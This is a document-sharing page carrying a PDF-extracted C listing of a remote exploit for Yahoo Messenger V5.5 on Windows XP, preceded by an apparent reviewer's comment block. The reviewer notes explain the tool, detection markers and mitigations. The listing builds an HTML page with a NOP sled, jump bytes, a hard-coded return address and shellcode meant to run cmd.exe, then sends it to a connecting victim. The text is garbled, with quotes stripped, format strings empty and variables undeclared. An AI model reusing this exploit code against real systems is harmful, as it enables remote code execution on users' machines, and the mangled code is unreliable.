
Remote Yahoo Messenger Exploiter



Thông tin tài liệu:

Remote Yahoo Messenger V5.5 Exploiter * ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]--* Dtors Security Research (DSR) * Code by: Rave * The buffer looks like this * |- */ #include #include #include #include #include /* These are the usual header files */ #include #include #include #define MAXDATASIZE 555 /* Max number of bytes of data */ #define BACKLOG 200 /* Number of allowed connections */ static int port =80; /* library entry inside msvcrt.dll to jmp 0xc (EB0C); */ char sraddress[8]="\x16\xd8\xE8\x77"; /* This shellcode just executes cmd.exe nothing...
Nội dung trích xuất từ tài liệu:
/*
 * Reviewer notes: a defensive reading of a damaged listing.
 *
 * Extraction state
 *   This text was flattened from a PDF and does not compile as shown.
 *   Quote characters around string and character literals are gone
 *   (e.g. "case ?:" and "fopen(index.html,w)"), the format strings of
 *   several fprintf(fptr, ...) calls are empty, and sd, fd2, numbytes,
 *   shellcode and sraddress are used without a declaration in this part.
 *   The leading "printf(...);}" is the tail of a function whose start is
 *   not shown (presumably Usage). The closing brace just before
 *   "return 0;" has no visible opener, so a block is missing between
 *   fclose(fptr) and the second fopen(); presumably the listen/accept
 *   loop, TODO confirm against an intact copy.
 *
 * What the visible code does
 *   HandleOptions() walks argv, handles -? (help), -P (port, via
 *   atoi(argv[i+1])) and -H/help, reports unknown options on stderr and
 *   returns the index of the first argument that is not an option.
 *   main() creates index.html and fills `buffer` as: `offset` (320) bytes
 *   of 0x90, with 0xeb 0x03 stored at offset-4 and offset-3, then 4 bytes
 *   copied from sraddress at `offset`, then strlen(shellcode) bytes of
 *   shellcode. `buffer` is handed to fprintf between two 0x22
 *   (double-quote) arguments; the format string itself is lost, so the
 *   surrounding markup cannot be stated from here. The file is then read
 *   back in MAXDATASIZE-sized chunks and each chunk is passed to send()
 *   on fd2.
 *
 * Detection-relevant content
 *   The generated page carries fixed marker strings: "Oohhh my god
 *   exploited", "Dtors Security Research (DSR)" and "Yah000 Messager
 *   Version 5.5 exploit....", together with a 320-byte run of 0x90. These
 *   are usable for content matching on a proxy or IDS, but only identify
 *   this unmodified build of the tool.
 *
 * Defects a reviewer would flag in the C itself
 *   - atoi(argv[i+1]) is reached without checking i+1 < argc, so a
 *     trailing -P passes argv[argc] (NULL) to atoi.
 *   - gets(sd) reads without a bound.
 *   - sd[numbytes] is written after fread() of up to MAXDATASIZE bytes;
 *     this is one past the end if sd holds exactly MAXDATASIZE bytes
 *     (sd's declaration is not visible, verify).
 *   - The results of WSAStartup() and send() are not checked.
 *
 * Mitigation context
 *   Per its own header the listing targets Yahoo Messenger V5.5 on
 *   Windows XP. The flaw being exercised is in the client, so the remedy
 *   is a fixed or supported client that bounds the copied value. The
 *   4-byte sraddress is a hard-coded address, which depends on a
 *   predictable module layout; address-space randomisation and
 *   non-executable data pages are the platform mitigations aimed at this
 *   technique.
 */
Remote Yahoo Messenger ExploiterRemote Yahoo Messenger V5.5 Exploiter* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---* Dtors Security Research (DSR)* Code by: Rave* The buffer looks like this* |-printf(\t\t---------------------------------------------------\n\n);}/* returns the index of the first argument that is not an option; i.e.does not start with a dash or a slash*/int HandleOptions(int argc,char *argv[]){int i,firstnonoption=0;for (i=1; i< argc;i++) {if (argv[i][0] == / || argv[i][0] == -) {switch (argv[i][1]) {/* An argument -? means help is requested */case ?:Usage(argv[0]);break;case P:port=atoi(argv[i+1]);break;case H:if (!stricmp(argv[i]+1,help)) {Usage(argv[0]);break;}/* If the option -h means anything else* in your application add code here* Note: this falls through to the default* to print an unknow option message*//* add your option switches here */default:fprintf(stderr,unknown option %s\n,argv[i]);break;}}else {firstnonoption = i;break;}}return firstnonoption;}int main(int argc,char *argv[]){FILE *fptr;unsigned char buffer[5000];int offset=320; // struct sockaddr_in server; /* servers address information */struct sockaddr_in client; /* clients address information */struct hostent *he; /* pointer for the host entry */WSADATA wsdata;WSAStartup(0x0101,&wsdata);if (argc == 1) {/* If no arguments we call the Usage routine and exit */Usage(argv[0]);return 1;}HandleOptions(argc,argv);fprintf(stdout,Creating index.html: );if ((fptr =fopen(index.html,w))==NULL){fprintf(stderr,Failed\n);exit(1);} e lse {fprintf(stderr,Done\n);}// memseting the buffers for preperationmemset(sd,0x00,MAXDATASIZE);memset(buffer,0x00,offset+32+strlen(shellcode));memset(buffer,0x90,offset);// whe place the a jmp ebp+0x3 instuction inside the buffer// to jump over the eip changing bytes at the en offset//// jmp 0x3// |____________^buffer[offset-4]=0xeb;buffer[offset-3]=0x03;memcpy(buffer+offset,sraddress,4);memcpy(buffer+offset+4,shellcode,strlen(shellcode));// here 
whe make the index.html// whe open it again if some one connects to the exploiting server// and send it over to the victim.fprintf(fptr,,0x22,0x22);fprintf(fptr,);fprintf(fptr,Oohhh my god exploited\n);fprintf(fptr,,0x22,0x22);fprintf(fptr,);fprintf(fptr,,0x22,0x22,0x22,0x22,0x22,0x22);fprintf(fptr,Dtors Security Research (DSR)\n);fprintf(fptr,Yah000 Messager Version 5.5 exploit....\n);fprintf(fptr,);fprintf(fptr,Contachheaven\x00\x00\x00,0x22,buffer,0x22);fprintf(fptr,.... \x00\x00\x00,0x22,0x22);fclose(fptr); // printf(You got a connection from %s (%s)\n,ine t_ntoa(client.sin_addr),he ->h_name);/* prints clients IP */fprintf(stdout,\nOpening index.html for remote user: );if ((fptr =fopen(index.html,r))==NULL){fprintf(stderr,Failed\n);exit(1);} e lse {fprintf(stderr,Done\n);}fprintf(stdout,Sending the overflow string... );// reading the index.html file and sending its// contents to the connected victimwhile (!feof(fptr)) {send(fd2,sd,strlen(sd),0);numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr);sd[numbytes * sizeof(char)]=\0;}send(fd2,sd,strlen(sd),0);printf(\n\n\nExploit Done....\n\n\n);printf(A shell is started @ %s lol\n\n\nPress any key to exit theexploit,inet_ntoa(client.sin_addr),he ->h_name);gets(sd);exit(0);}return 0;}
